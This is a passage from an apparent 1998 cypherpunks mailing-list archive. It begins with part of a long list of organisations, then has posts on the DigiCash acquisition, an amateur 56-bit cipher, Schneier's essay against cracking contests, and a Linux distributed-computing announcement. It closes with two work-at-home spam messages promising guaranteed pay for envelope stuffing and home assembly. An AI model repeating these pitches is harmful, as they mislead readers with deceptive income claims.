535; SEIU Local 616; Serbian Unity Congress; 
Shell Boycott Comm.; Simon Wiesenthal Center; Sister City Assn;
Socialist Action; Socialist Party Political 
Org.; Socialist Workers Party; Society of In'Ash El-U.S.A.; SOHRI
Study Group (U.C. Berkeley); Solidarity; S.A. 
Forum; S.A. Freedom Through Education Foundation; S.A. Internatl.
Student Congress; South African Workers Org.; 
South Bay Nicaragua Solidarity Comm.; So. African Liberation Support
Comm.; Southern African Media Center; 
Spartacus Youth League; Spartacist League; Stevens, Hinds & White,
Attorneys; Stop the U.S. War Machine Action 
Network; Student Cltn. Against Apartheid and Racism; Student
Pugwash; Students Against Intervention; Students 
Against Intervention in Cent. Am.; Students for Peace in the Persian
Gulf; SWAPO; SWAPO Meeting; 
Tass News Agency; Teamsters Local 921, S.F. Teamsters for a
Democratic Union; Technica; The Black Scholar; The
Data Center; The Dazen-I Foundation; The Irishman; The Nuclear
Resister; Third World Resources; Toronto
Anti-Intervention Coalition; Trustee, IAM Local 565 (Sunnyvale); 
Ubiquitous; Unified Against Genocide; Union del Barrio; Union of
Democratic Filipinos; Union Publications; 
United Auto Workers; United Auto Workers, Local 119; United Colors;
United Farm Workers; United Front Against 
Fascism; U.S. Anti-Apartheid Newsletter; U.S. China Review; U.S.
Comm. for Friendship with the GDR; U.S.-Cuba 
Labor Exchange; U.S.-Grenada Friendship Society; U.S. Out of S.A.
Network; U.S. Peace Council; U.S.-USSR 
Friendship Society of S.F.; U.S.A. Movement Banning Apartheid; Univ.
of Calif., Berkeley; UTU Local 1730; 
Vanguard Public Foundation; Venceremos Brigade; Vietnam Veterans
Action; Vietnam News Agency; Villa Zapata
Workers Comm.; Voice of the Uprising; 
Washington Office on Africa; WBAI-FM (Pacifica Foundation) New York;
Weatherman Underground; Witness for S.A.;
Woman, Inc.; Women Against U.S. Intervention; Women in Black; Women
of Color Coalition Center; Women of Color
Resource Project; Women's Intl. League for Peace and Freedom;
Workers World Party; 
Yes on W Comm.; Young Koreans United; Young Koreans United of S.F. 
Arab-American Democratic Club; Arab Book Center; Arab People's
Coalition; Arab Relief Fund of Lebanon; Arab
Studies Quarterly/Middle East Research and Information Project;
Arab- American Univ. Graduates; Arabic Book 
Center; Bethlehem Assn.; Black Muslims; Comm. for a Democratic
Palestine; Comm. of Correspondence; Council of 
Arab-American Orgs.; Dem. Front for the Liberation of Palestine;
Democratic Palestinian Youth; Department of 
Near Eastern Studies; El Fatah; Family Sponsorship Project; General
Union of Palestinian Students; 
Inst. of African-American Studies; Iranian Students Assn.; Iraqi
Intelligence Officer; Islamic Jihad; Islamic 
Society of Orange County; Israeli Civil Right Assn.; JIFNA
Association; Khilafah; Law in the Service of Man; 
Masjid Al-Islam; Masqid Al-Saff Mosque; Middle East Justice Network;
Muslim Mutadhakkirun Assn.; Muslim 
Students Assn.; Muslim Students Union; Nation of Islam; National
Assn. of Arab-Americans; National Lawyers 
Guild; November 29th Comm.; Occupied Land Fund; Palestine American
Youth; Palestine Arab Club; Palestine Arab 
Fund; Palestine Democratic Youth Org.; Palestine Human Rights
Campaign; Palestine Solidarity Comm.; Palestine 
Women's Org.; Popular Front for the Liberation of Palestine;
Progressive Muslim Alliance; Sacred House of 
Islam; Union of Palestinian Women's Association; ANC A Movement
Banning Apartheid; African National Congress; 
All African Peoples Revolutionary Party; All-African Student
Conference; Alternative Education (RSA) (SACHED); 
Anglican Church Bd. of Social Responsibility; Anti-Apartheid Comm.;
Anti- Apartheid L.A.; Apartheid Boycott 
Campaign; Art Against Apartheid; Artists Against Apartheid; Bay Area
Free S.A. Movement; Berkeley 
Anti-Apartheid Network; Canicor Research/S.A. Forum; Democratic
Socialists of America; Dennis Brutus Defense 
Comm.; Evangelical Lutheran Church/S.A.; Free Moses Mayekiso
Committee; Journalist LA Times (in S.A.); 
National Namibia Concerns; Pan African Congress; Pan Africanist
Congress; Pan-Africa Congress of Azania; 
Prairie Fire Organizing Comm.; S.A. Ecumenical Task Force; S.F.
Anti-Apartheid Comm.; South African Student 
Congress; Southern Africa Media Center; Univ. of Calif. Divestment
Coalition





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Wed, 16 Dec 1998 12:34:58 +0800
To: <cryptography@c2.net>
Subject: DigiCash Update, part II
Message-ID: <004d01be28a9$64561620$0401010a@luckylaptop.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



As some of you may be aware of, I am involved with an effort to
acquire DigiCash. Allow me therefore to suggest that now is not a good
time to attempt to purchase a patent license directly from DigiCash.
You would most likely be paying too much.

DigiCash has for months now attempted to find a buyer for the
company's assets. Due to the expectations on the value of the assets, and
differences between this and the offers they've received, the board has
turned down these offers, including the first offer by my group. Ultimately,
the
differences between some of the high expectations the board has, and
the actual offers they are receiving will be worked out between higher
offers and lower expectations. Until then, DigiCash operates on a
post-bankruptcy filing bridge loan. This loan won't last forever.

Ultimately, DigiCash will be sold. But nobody wants to wait forever.
Not you, not me, not the DigiCash board. The faster DigiCash gets sold
to our group, the faster the technology will become available to all
interested parties under low cost (and in many cases free) licensing
terms. Even if DigiCash should now be willing to sell licenses to
generate cash flow or reorganize in some new plan and forestall the
inevitable sales of assets a little bit longer, the current DigiCash
is unlikely to make the licenses available for as low of a cost as our
group will make them available after an acquisition of DigiCash.

We are in a position to offer potentially significant cost
minimization to any prospective licensee of DigiCash IP. With every
additional party committing to our effort, we can reduce the cost per
license. Scott of course would be amiss of his fiduciary duty would he
not attempt to maximize the financial return to DigiCash. We have no
such constraint.   I have a lot of respect for Scott and he is trying
to do what is best for the DigiCash shareholders and debtholders (As
he should).   We on the other hand are more focused on what is best for
the technology, to ensure it is deployed widely and in all it's
various potential uses.

The more serious parties join our effort, the faster will we be able
to make another bid and the faster the DigiCash board will review and
hopefully approve our next offer. Ultimately, everybody will be happy.
The creditors will be happy since they get their money, the current
executive group at DigiCash will be happy to move on having
successfully found a palatable deal, and the licensees will be happy,
since they will be able to obtain the IP and options for support and
technology development instead of being held in limbo with the present
DigiCash situation. And of course the developer community will be
happy, since the patents will be available to all, not just to the few
to which DigiCash might license the patents to improve their
unfortunate cash flow situation. This broad availability will allow
the market to validate the technology. No single player, or even small
group of players, can make eCash a success. Only an aggressive push by
many large, small and medium sized players who are all deploying eCash
and blinded private payment systems can.

This is one of the many reasons our group has the support of several
of the larger banks in the world, banking software/EDI vendors, credit
card clearing houses, personal financial/cryptography software
vendors, global media corporations, and other players that are
required to make eCash and other DigiCash IP derived technologies
ubiquitous.

Feel free to contact DigiCash directly if you must.   We certainly
encourage people who are interested in exclusive ownership of the
DigiCash IP, and are not interested in opening up the patents or
technology to deal directly with them since this is contrary to our
goal.   But if you are interested in any one part, one use or
application or even in all of the parts in a non-exclusive way please
make sure to email me first as I believe it will benefit everyone for
a lot less money.

--Lucky Green <shamrock@netcom.com>
  I will soon revoke my PGP key 0x375AD924 for
  administrative reasons.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 16 Dec 1998 04:13:03 +0800
To: cypherpunks@cyberpass.net
Subject: WEAK3-EX -- A Layman's 56-bit Data Encryption Algorithm
Message-ID: <3676B5B3.E37D80C@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



In the previous products of my WEAK series of data encryption 
algorithms I have very strongly exploited the possibility of using 
arbitrarily long keys. Since this conflicts with the recent 
requirement of using 56-bit keys, a new program, WEAK3-EX, has been 
designed specifically for users that can only use 56-bit encryption 
keys. The design draws upon various techniques that have been 
accumulated in the course of the development of the previous WEAK3-E.

Besides employing constant length 56-bit keys, a new feature that is 
introduced in WEAK3-EX is a user choosable scaling factor for the
initialization time of the algorithm. Normally the initialization
time of crypto algorithms are small and is for obvious reasons to be
reduced as far as technically possible. In fact, the initialization
time of almost all known encryption algorithms is negligible compared
to the proper record processing time. Our algorithm, which contains
author's compound PRNG, is however an exception to the rule. For,
depending on the number of the constituent generators of the compound
PRNG used, this can under circumstances indeed attain a non-trivial
value. This is till present a necessary evil of our WEAK3-E which now
fortunately in the special case of key length restriction (with the
obvious accompanying unfavourable strength reduction effect) can be
turned into a virtue of our new WEAK3-EX. In fact, if the (variable) 
parameters to be chosen by the user (in particular the number of rounds)
of our algorithm are adequate, brute force would be the only feasible
method of attack. Now the average time for brute force is equal to the
time of running a single encryption/decryption process multiplied by
one half of the size of the key space. If the initialization time of the
algorithm is increased, the time for brute forcing correspondingly
increases so that through suitable choice of the said scaling factor it
can reach practically infeasible value for analysis without however
on the other hand rendering the total processing time of the user 
(which of course also augments) to amounts entirely inacceptable for 
him. (The multiplying factor of one half of the key space is the 
leverage we exploit here.)

Technically, the scaling factor determines the number of pseudo-random
numbers retrieved from the shuffling buffer (of Bays and Duncan) that
are to be combined into one pseudo-random number through the addition
mod 1 operation (device of Wichmann and Hill) for subsequent
utilization in building up the constituent generators of author's
compound PRNG. The larger the scaling factor, the longer it will take
to build up the compound PRNG.

The multiple-seed standard PRNG employed in WEAK3-E is abandoned in
WEAK3-EX in order to comply with the 56-bit key restriction. In
its place is a standard PRNG that consists of two internal (single-seed)
PRNGs which are activated alternatingly and which each accepts a seed
of 28 bits, totalling 56 bits.

An implementation in Fortran 90 is given in

     http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper13

Both source and a binary executable file for PC can be downloaded via
my main Web page.

I wish to thank CWL and ZFS for suggesting the use of the scaling
factor.

Constructive critiques, comments and suggestions for improvements are
sincerely solicited.

M. K. Shen


P.S. For space and obvious reasons, I plan to remove the code and
binaries of WEAK1, WEAK2, WEAK3 and WEAK3-E from my Web page this
Friday, leaving in future WEAK3-EX the single encryption software
accessible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 16 Dec 1998 12:41:48 +0800
To: cypherpunks@toad.com
Subject: The Fallacy of Cracking Contests
Message-ID: <4.0.2.19981215202538.00a42b90@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain




	The Fallacy of Cracking Contests
                      Bruce Schneier


You see them all the time: "Company X offers $1,000,000 to anyone who can
break through their firewall/crack their algorithm/make a fraudulent
transaction using their protocol/do whatever."  These are cracking
contests, and they're supposed to show how strong and secure the target of
the contests are.  The logic goes something like this:  We offered a prize
to break the target, and no one did.  This means that the target is secure.

It doesn't.

Contests are a terrible way to demonstrate security.  A
product/system/protocol/algorithm that has survived a contest unbroken is
not obviously more trustworthy than one that has not been the subject of a
contest.  The best products/systems/protocols/algorithms available today
have not been the subjects of any contests, and probably never will be.
Contests generally don't produce useful data.  There are three basic
reasons why this is so.

1.  The contests are generally unfair.  

Cryptanalysis assumes that the attacker knows everything except the secret.
 He has access to the algorithms and protocols, the source code,
everything.  He knows the ciphertext and the plaintext.  He may even know
something about the key.

And a cryptanalytic result can be anything.  It can be a complete break: a
result that breaks the security in a reasonable amount of time.  It can be
a theoretical break: a result that doesn't work "operationally," but still
shows that the security isn't as good as advertised.  It can be anything in
between.

Most cryptanalysis contests have arbitrary rules.  They define what the
attacker has to work with, and how a successful break looks.  Jaws
Technologies provided a ciphertext file and, without explaining how their
algorithm worked, offered a prize to anyone who could recover the
plaintext.  This isn't how real cryptanalysis works; if no one wins the
contest, it means nothing.

Most contests don't disclose the algorithm.  And since most cryptanalysts
don't have the skills for reverse-engineering (I find it tedious and
boring), they never bother analyzing the systems.  This is why COMP128,
CMEA, ORYX, the Firewire cipher, the DVD cipher, and the Netscape PRNG were
all broken within months of their disclosure (despite the fact that some of
them have been widely deployed for many years); once the algorithm is
revealed, it's easy to see the flaw, but it might take years before someone
bothers to reverse-engineer the algorithm and publish it.  Contests don't
help.

(Of course, the above paragraph does not hold true for the military.  There
are countless examples successful reverse-engineering--VENONA, PURPLE--in
the "real" world.  But the academic world doesn't work that way,
fortunately or unfortunately.)

Unfair contests aren't new.  Back in the mid-1980s, the authors of an
encryption algorithm called FEAL issued a contest.  They provided a
ciphertext file, and offered a prize to the first person to recover the
plaintext.  The algorithm has been repeatedly broken by cryptographers,
through differential and then linear cryptanalysis and by other statistical
attacks.  Everyone agrees that the algorithm was badly flawed.  Still, no
one won the contest.

2.  The analysis is not controlled.

Contests are random tests.  Do ten people, each working 100 hours to win
the contest, count as 1000 hours of analysis?  Or did they all try the same
things?  Are they even competent analysts, or are they just random people
who heard about the contest and wanted to try their luck?  Just because no
one wins a contest doesn't mean the target is secure...it just means that
no one won.

3.  Contest prizes are rarely good incentives.  

Cryptanalysis of an algorithm, protocol, or system can be a lot of work.
People who are good at it are going to do the work for a variety of
reasons--money, prestige, boredom--but trying to win a contest is rarely
one of them.  Contests are viewed in the community with skepticism: most
companies that sponsor contests are not known, and people don't believe
that they will judge the results fairly.  And trying to win a contest is no
sure thing: someone could beat you, leaving you nothing to show for your
efforts.  Cryptanalysts are much better off analyzing systems where they
are being paid for their analysis work, or systems for which they can
publish a paper explaining their results.

Just look at the economics.  Taken at a conservative $125 an hour for a
competent cryptanalyst, a $10K prize pays for two weeks of work, not enough
time to even dig through the code.  A $100K prize might be worth a look,
but reverse-engineering the product is boring and that's still not enough
time to do a thorough job.  A prize of $1M starts to become interesting,
but most companies can't afford to offer that.  And the cryptanalyst has no
guarantee of getting paid: he may not find anything, he may get beaten to
the attack and lose out to someone else, or the company might not even pay.
 Why should a cryptanalyst donate his time (and good name) to the company's
publicity campaign?

Cryptanalysis contests are generally nothing more than a publicity tool.
Sponsoring a contest, even a fair one, is no guarantee that people will
analyze the target.  Surviving a contest is no guarantee that there are no
flaws in the target.

The true measure of trustworthiness is how much analysis has been done, not
whether there was a contest.  And analysis is a slow and painful process.
People trust cryptographic algorithms (DES, RSA), protocols (Kerberos), and
systems (PGP, IPSec) not because of contests, but because all have been
subjected to years (decades, even) of peer review and analysis.  And they
have been analyzed not because of some elusive prize, but because they were
either interesting or widely deployed.  The analysis of the fifteen AES
candidates is going to take several years.  There isn't a prize in the
world that's going to make the best cryptanalysts drop what they're doing
and examine the offerings of Meganet Corporation or RPK Security Inc., two
companies that recently offered cracking prizes.  It's much more
interesting to find flaws in Java, or Windows NT, or cellular telephone
security.

The above three reasons are generalizations.  There are exceptions, but
they are few and far between.  The RSA challenges, both their factoring
challenges and their symmetric brute-force challenges, are fair and good
contests.  These contests are successful not because the prize money is an
incentive to factor numbers or build brute-force cracking machines, but
because researchers are already interested in factoring and brute-force
cracking.  The contests simply provide a spotlight for what was already an
interesting endeavor.  The AES contest, although more a competition than a
cryptanalysis contest, is also fair 

Our Twofish cryptanalysis contest offers a $10K prize for the best negative
comments on Twofish that aren't written by the authors.  There are no
arbitrary definitions of what a winning analysis is.  There is no
ciphertext to break or keys to recover.  We are simply rewarding the most
successful cryptanalysis research result, whatever it may be and however
successful it is (or is not).  Again, the contest is fair because 1) the
algorithm is completely specified, 2) there are no arbitrary definition of
what winning means, and 3) the algorithm is public domain.

Contests, if implemented correctly, can provide useful information and
reward particular areas of research.  But they are not useful metrics to
judge security.  I can offer $10K to the first person who successfully
breaks into my home and steals a book off my shelf.  If no one does so
before the contest ends, that doesn't mean my home is secure.  Maybe no one
with any burgling ability heard about my contest.  Maybe they were too busy
doing other things.  Maybe they weren't able to break into my home, but
they figured out how to forge the real-estate title to put the property in
their name.  Maybe they did break into my home, but took a look around and
decided to come back when there was something more valuable than a $10,000
prize at stake.  The contest proved nothing.

Gene Spafford wrote against hacking contests.
http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/old-issues/issue9602

Matt Blaze has too, but I can't find a good URL.


**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Wed, 16 Dec 1998 05:56:02 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: WEAK3-EX -- A Layman's 56-bit Data Encryption Algorithm
In-Reply-To: <3676B5B3.E37D80C@stud.uni-muenchen.de>
Message-ID: <3676CD09.27818DBE@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Mok-Kong Shen wrote:
> P.S. For space and obvious reasons, I plan to remove the code and
> binaries of WEAK1, WEAK2, WEAK3 and WEAK3-E from my Web page this
> Friday, leaving in future WEAK3-EX the single encryption software
> accessible.

Hmm. The "obvious reasons" being one or more of the following:

a) You think people shouldn't be allowed strong crypto
b) You think the US shouldn't have to go to the trouble of getting laws
changed, we should just obey their whims voluntarily
c) You are on the NSA's payroll

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Wed, 16 Dec 1998 10:45:35 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: HAS The Revolution Died??
In-Reply-To: <c62975ab329fc89517e6a338b0fc967f@anonymous>
Message-ID: <36771611.ADDE6C67@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





HyperReal-Anon wrote:

>  "I CANT PARTICIPATE IN THE REVOLUTION BECAUSE I DIDNT
>   GET ENOUGH NOTICE OR ITS TOO INCONVENIENT OR THEY
>   ARE USING LEFTIST PROTEST TECHNIQUES" ...

As was diagnosed in the case of Richard M. Nixon, these are the tragic
and irreversible symptoms of terminal adult syndrome. Infected are
pasture bound.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Dec 1998 11:34:22 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Distributed Programming with DIPC (fwd)
Message-ID: <199812160312.VAA10007@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-sparclinux-outgoing@vger.rutgers.edu Tue Dec 15 20:47:43 1998
Date: 	Tue, 15 Dec 1998 17:09:40 -0600 (CST)
From: Kamran Karimi <karimi@cs.uregina.ca>
To: sparclinux@vger.rutgers.edu
Subject: Distributed Programming with DIPC
Message-ID: <Pine.SGI.3.91.981215170900.10107H-100000@MERCURY.CS.UREGINA.CA>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Orcpt: rfc822;sparclinux@vger.rutgers.edu
Sender: owner-sparclinux@vger.rutgers.edu
Precedence: bulk
X-Loop: majordomo@vger.rutgers.edu

To people interested in distributed programming and clustering under Linux,

 This is to introduce DIPC (Distributed Inter-Process Communication). 
DIPC is a software-only solution for very easy distributed programming under 
the Linux operating system. Here developers design their applications 
as a group of processes, each possibly running on a different Linux computer, 
and then use DIPC to _transparently_ exchange data between them. The main 
objective of the DIPC project is to make distributed programming as much like 
"normal" programming as possible.

 DIPC hides itself behind UNIX System V's IPC mechanisms, consisting of 
Semaphores, Messages, and Shared Memories, and makes them work over a network. 
This means that DIPC offers, among other things, Transparent Distributed 
Shared Memory (DSM) with strict consistency: Processes can read from and 
write to the shared memory with no need for any explicit synchronization!
This makes DIPC very different from systems like PVM or MPI. The source code 
of a DIPC program is nearly identical to a normal UNIX program using System V 
IPC. Actually, a DIPC program can even run in a Linux computer with no DIPC 
support; no need for recompilation. System V IPC is widely available in 
UNIX variants, and is very well documented, meaning that developers may 
already know the programming interface, or they can learn it very easily, 
confident that the usefulness of the newly learned material is not tied to 
the availability of DIPC. This is in sharp contrast to most other distributed 
programming systems.

 Using a mainly "shared-memory" programming interface means that the same 
distributed application can also run on a multi-processor Linux machine
at "full speed"

 DIPC modifies the Linux kerenl in order to offer its excellent degree of 
transparency. There are no needs for any link libraries, and it can be 
used from any programming language that allows access to the OS calls.
The hardware can consist of a single Linux machine, or a cluster of computers 
connected to each other by a TCP/IP network. DIPC has been tested on 
inter-continental WANs and is a heterogeneous system, as it can run on 
Linux/i386 and Linux/m68k, with both versions being able to talk to each
other. (volunteers for porting DIPC to other CPU families are welcome).

 People intersted in distributed systems can easily and safely try DIPC. After 
patching a standard Linux kernel, DIPC becomes a configuration option 
(make config), and can be left out at compile time if desired. When DIPC is 
compiled in, it can be turned off any time with no need for a reboot.

 For more more information about DIPC, visit http://wallybox.cei.net/dipc . 
You can download the package (which includes the sources and the 
documentation) from the web page, or from ftp://wallybox.cei.net/pub/dipc . 
A mailing list devoted to discussions about DIPC is addressed at
linux-dipc@wallybox.cei.net . Feel free to send your comments and questions
here. To view the previous posts to DIPC's mailing list target your browser 
at http://wallybox.cei.net/dipc/ml-archive .

-Kamran Karimi
-
To unsubscribe from this list: send the line "unsubscribe sparclinux" in
the body of the message to majordomo@vger.rutgers.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Wed, 16 Dec 1998 14:14:26 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: DigiCash Update, part II
In-Reply-To: <004d01be28a9$64561620$0401010a@luckylaptop.c2.net>
Message-ID: <Pine.SOL.3.91.981215223722.6492B-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Dec 1998, Lucky Green wrote:

> Date: Tue, 15 Dec 1998 20:06:01 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: dbs@philodox.com, "E$@Vmeng. Com" <e$@vmeng.com>,
>     "Cryptography@C2. Net" <cryptography@c2.net>
> Cc: cypherpunks@algebra.com
> Subject: DigiCash Update, part II
> 
> As some of you may be aware of, I am involved with an effort to
> acquire DigiCash. Allow me therefore to suggest that now is not a good

Exellent news, Lucky!

Good luck in your negotiations and a beneficial outcome for
business and freedom.

happy holidays,

jim burnes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 16 Dec 1998 13:25:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Fallacy of Cracking Contests
In-Reply-To: <4.0.2.19981215202538.00a42b90@mail.visi.com>
Message-ID: <199812160451.WAA09943@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier writes:
 
 > 3.  Contest prizes are rarely good incentives.
 
          ...
 
> Just look at the economics.  Taken at a conservative $125 an hour for
> a competent cryptanalyst, a $10K prize pays for two weeks of work,
> not enough time to even dig through the code.  A $100K prize might be
> worth a look, but reverse-engineering the product is boring and that's
> still not enough time to do a thorough job.  A prize of $1M starts to
> become interesting, but most companies can't afford to offer that.
 
Another point to consider is that a company sponsoring a contest,
particularly one which involves one of its products, has a great
interest in measuring the state of existing relevant art, and almost
no interest at all in directly funding new research leading to the
destruction of its cipher.
 
Most such contests have very carefully structured rules, and prizes
that are not too large, to sample what current tools and algorithms
can do, without single-handedly funding expeditions into unexplored
territory.
 
Factoring contests are a good example of this, where you get a few
thousand dollars for breaking something slightly larger than the last
thing broken, rather than $10 million for inventing the singing and
dancing factoring algorithm of the future, and breaking the 500
decimal digit key.
 
> I can offer $10K to the first person who successfully breaks into my
> home and steals a book off my shelf.  If no one does so before the
> contest ends, that doesn't mean my home is secure.  Maybe no one with
> any burgling ability heard about my contest.  Maybe they were too busy
> doing other things.  Maybe they weren't able to break into my home,
> but they figured out how to forge the real-estate title to put the
> property in their name.  Maybe they did break into my home, but took a
> look around and decided to come back when there was something more
> valuable than a $10,000 prize at stake.  The contest proved nothing.
 
Exactly.  Contests do nothing in the absence of prior academic
interest in the problem, and even then only serve to spotlight and
highlight what already exists.  Contests do not drive research, nor do
they prove ciphers secure.
 
Still, they're fun.

--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EquiAly2@aol.com
Date: Wed, 16 Dec 1998 14:01:56 +0800
Subject: !! Wanted Home Product Assemblers !!
Message-ID: <ce8e6e11.36773b50@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



*****This is a one time Mailing.  You will not receive mail from us
again.*****

Looking for Home Product Assemblers!!  How would you like to Assemble Products
at Home & get Paid!  Choose your own Hours!  Be your own Boss!  Easy Work!
Excellent Pay!  Earn Hundreds of Dollars Weekly!  Here are just a few examples
of the work you will have to choose from:

Wooden Products - up to $220.00 Weekly!
Hair Accessories - up to $320.00 Weekly!
Holiday Crafts - up to $270.00 Weekly!
Beaded Accessories - up to $350.00 Weekly!

........Plus many others.  There are over 75 Companies to choose from!  Why
not enjoy the Benefits and Freedom of Home Assembly Work!  To find out more
Call.....Toll Free (24 Hour Recording) 1-888-289-9708.

U.S. Publishing Co.
P.O. Box 633
Rocky Mount NC  27802

Name

___________________________________________

Address

___________________________________________

City & State

___________________________________________ 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Dec 1998 07:47:10 +0800
To: cypherpunks@cyberpass.net
Subject: ARMCHAIR Commando List(Cypherpunks@cyberpass.net)
Message-ID: <199812152252.XAA26125@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



 "I CANT PARTICIPATE IN THE REVOLUTION BECAUSE I DIDNT
  GET ENOUGH NOTICE OR ITS TOO INCONVENIENT OR THEY
  ARE USING LEFTIST PROTEST TECHNIQUES"
  EXPORTING PGP WITHIN MINUTES OF ITS RELEASE
  NOW THAT WOULD IMPRESS ME...
  (BEEN THERE DONE THAT!)
   NOW I am trying to shake the apathy from all of you..
   Its so much easier to talk about revolution than
   participating or contributing...
   Talking about revolution does NOT make it happen
   magically..
  
   I suspect the revolution will die given the above
   
   anon

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Morris <jmorris@intercode.com.au>
Date: Tue, 15 Dec 1998 22:25:37 +0800
To: cypherpunks@toad.com
Subject: Steganography ?
In-Reply-To: <259a896938e4522ccd3d711a4d41f7c9@anonymous>
Message-ID: <Pine.LNX.3.96.981216002518.8692A-100000@aurora.intercode.com.au>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Dec 1998, Mixmaster wrote:

> There used to be a web site called "Throwing Sand into the All-Seeing Eye" 
> which listed a long list of possible NSA-snooper keywords, such as military 
> classifications and code words that could be sent for fun across the 
> Internet for sole purpose of being flagged by the NSA.

I imagine they(tm) would have countermeasures for this kind of thing,
given that once they catch a keyword, they know it's source, and have some
idea of the kinds of patterns which are likely to be real communications. 

The Web site probably went straight into a junk filter, which would make
it an ideal place to post your secrets from then on :-)

- James.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Tue, 15 Dec 1998 20:26:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Forced DNA Collection
Message-ID: <91372205409340@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian <emc@wire.insync.net> writes:
 
>Top Story on AP...
>
>NEW YORK (AP) -- Despite objections from civil libertarians, the city's
>police  commissioner proposed Monday to take a DNA sample along with the
>fingerprints  of everyone arrested.
> 
>Commissioner Howard Safir said the test would solve crimes and help curb 
>repeat offenders. ``The innocents have nothing to fear ... only if you are 
>guilty should you worry about DNA testing,'' he said.
 
The Commissioner messed up the quote, it's actually:
 
  "I am returning to punish the guilty; the innocent have nothing to fear"
   - Lucius Cornelius Sulla, 90BC, just before he massacred the innocent en 
     masse.
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bob@usa.net
Date: Wed, 16 Dec 1998 19:36:28 +0800
To: <cypherpunks@toad.com>
Subject: Easy Money $$  <<Work At Home Jobs>>  Stuffing Envelopes:  $3 Per Envelope, Guaranteed!
Message-ID: <199812161048.CAA22493@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Read how you can earn $3 for each envelope that you fill with my 
sales materials from your own comfortable home- 100% Totally 
Guaranteed!!
          
     <<<<    STUFF 1000 ENVELOPES AND GET PAID $3000!       >>>> 

"If you stuff 1000 envelopes with our sales materials, you are 
guaranteed to be paid $3000 in cash"

Hello Friend and Job seeker,
    
     Are you looking to be your own boss, interested in creating 
and controlling your own work hours/schedule, and working from 
your comfortable home?

     How about making more money in a week than you currently 
make in a month?  Do you want to stop struggling for the low 
wages you are currently earning?

     Can you find the time to put our sales materials in 1000 
envelopes and make $3000 in cash?  How about 2000 envelopes for 
$6000 in cash?  (you decide as there is no limit:   we want to 
send out our materials continuously and abundantly)

     If you have answered yes to any of these questions...
  
Let me be the first to welcome you to BETTER SOLUTIONS.

     My name is Andrew Devore, President of Better Solutions.  I 
have perfected a method that allows you to earn $3 per envelope 
that you stuff with my sales materials.  And for a limited time, 
I am seeking out people just like you who wish to have more 
financial security, greater amounts of  spending money, an 
improved standard of living, and a desire to work at home.
  
          <<An Explanation of Why I Need your Assistance.>>

     We would like to mail our offers out to hundreds of 
thousands of people in the U.S.  And if we have home workers 
handle the jobs of stuffing and mailing, we save big money on 
overhead, extra office spaces, and having to hire more staff.
   
             THIS SYSTEM IS UNBELIEVABLY EASY TO USE:

     Absolutely anyone can do this.  You can be young or old, 
with or without a college degree.  You do not need any special 
training or even a high school diploma.  It also doesn't matter 
where you live.  I am not kidding, it is really that simple. 

     And the greatest news of all, there is no limit on how many 
envelopes you want to stuff.  If you stuff 300 envelopes, you 
